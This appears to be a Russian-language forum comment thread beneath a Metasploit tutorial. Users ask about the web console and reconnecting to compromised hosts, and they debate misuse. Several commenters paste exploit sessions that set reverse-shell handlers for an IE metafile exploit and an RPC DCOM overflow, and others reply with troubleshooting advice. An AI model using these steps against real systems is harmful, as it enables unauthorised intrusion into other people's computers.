Парни тут такая ситуация я подключился через web интерфейс,а как перевести в консоль ??? И как после off-line'а востановить соеденение с конкретным ip ???
Кнопочку Console нажми - будет тебе сэмулирована консоль в web. (это актуально для MSF 3.0) в 2.7 отдельный батник для запуска консоли... Что значить восстановить соединение с конкретным ip ? С взломанным компом что-ль? Никак, если троя, систему удалённого администрирования и т. п. не залил на комп жертвы... - снова ломать нада, команда rexploit (реэксплуатация, ну типа перезапустить сплоит, если все параметры уже заданы).
Очередная статья, появивщаяся в результате радости познания новых технологий самим автором. Это нормально... Помоему на том же метасплойте есть документация. А тут просто переведенная в молодежный формат со словами "...О! тут дофига всего..." и "...Облом! Это что ещё?..." мануал. Проще было бы если бы ты просто перевел на русский ридми (или что там у них?) или составил бы описание того, что знаешь и так бы и написал - "перевод на русский доков"/"описание того что я сам понял в metasploit" В основном статья выглядит серьезным трудом из-за разноцветных заголовков, на которые, уверен, действительно ушло много времени. Ну зато хотя бы тема серьезная а не "компеляцоя пинча в среде виндоус 95 для новичков". Нерд вынудила поставить плюс за статью потому что "я офигел" по её словам... знали бы авторы метасплойта для чего используют их творение - потеряли бы веру в человечество ; )
Глянь видео моё, увидишь что для благих целей использую... (я по крайней мере). - Так что авторы веру в человечество не потеряют, кстате им особый респект за этот проект.
хорошая статья узнал чё такое Metasploit а то до этого только чёто слышал от себя могу добавить для установки Metasploit Framework в генто линукс надо: emerge -av net-analyzer/metasploit
Вообще-то, зря все так подробно разжевано, и указан способ использования МСФ не по назначению. Почему? Да просто прочитав эту статью появятся кулхацкеры, будут крушить, ломать все подряд. Но все равно lebed кул статья, как минимум видно, что старался для таких как я. Кстати, KEZ, у любого изобретения есть минимум 2 способа его использования. Примеры приводить не буду, потому что в голову приходят всякий бред. В любом случае автору зачот. П.С. Сорри, если уж как-то самоуверенно говорю.
Новые эксплоиты щас пишутся на Руби (для ветки MSF 3.0), расширение у них соответственно .rb лежат в соответствующих подпапках тут: c:\Program Files\Metasploit\Framework3\framework\modules\exploits\ Онлайн апдейт решает проблему добавления новых сплоитов автоматом. Поддержка MSF 2.7 в плане написания новых сплоитов имхо официально не осуществляется. (можешь писать сам сплоиты для MSF 2.7)
у меня пишет что клиент подключился,идёт редиректинг.. какой адрес нужно указать для редиректинга?у меня адсл.
я задаю внешний ip. а он всё равно открывает сервак на IP одинаковом для всех пользователей нашей сети .. что делать? msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 88.147.181.4 LHOST -> 88.147.181.4 msf ie_xp_pfv_metafile(win32_reverse) > exploit [*] Starting Reverse Handler. [*] Waiting for connections to http://192.168.1.33:8080/ [*] HTTP Client connected from 192.168.1.33:1910, redirecting...(захожу сам IE 6) [*] HTTP Client connected from 192.168.1.33:1913, redirecting...(захожу сам IE6 ) и.. ничего. всё.В чём причина?
Т.е. даже сам себя похекать не можешь? Тут имхо может быть несколько вариантов: а) редирект происходит, если порт уже чем то занят, вот и идёт перебор по всем попорядку... б) порты закрыты фаером или используется NAT. в) сплоит не пробивает систему (браузер)=пропатчена. г) бажная dll не подгружается, так как вредоносный tiff-файл обрабатывается другой dll (Например установлен ACDSee) и шеллкод (реверсшелл) не получает управления. ЗЫ тесть на чистой XP SP2 и всё должно получиться...
В сети есть уязвимый компьютер (Microsoft RPC DCOM Interface Overflow ) При эксплойтировании metasploit'ом v 3.0 ничего не выходит:[*] Started reverse handler [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal... [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.11.109.2[135] ... [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:10.11.109.2[135] ... [*] Sending exploit ... [-] Exploit failed: DCERPC FAULT => nca_s_fault_ndr Хотя, используя версию 2.6, всё проходит на ура. В чём может быть трабла?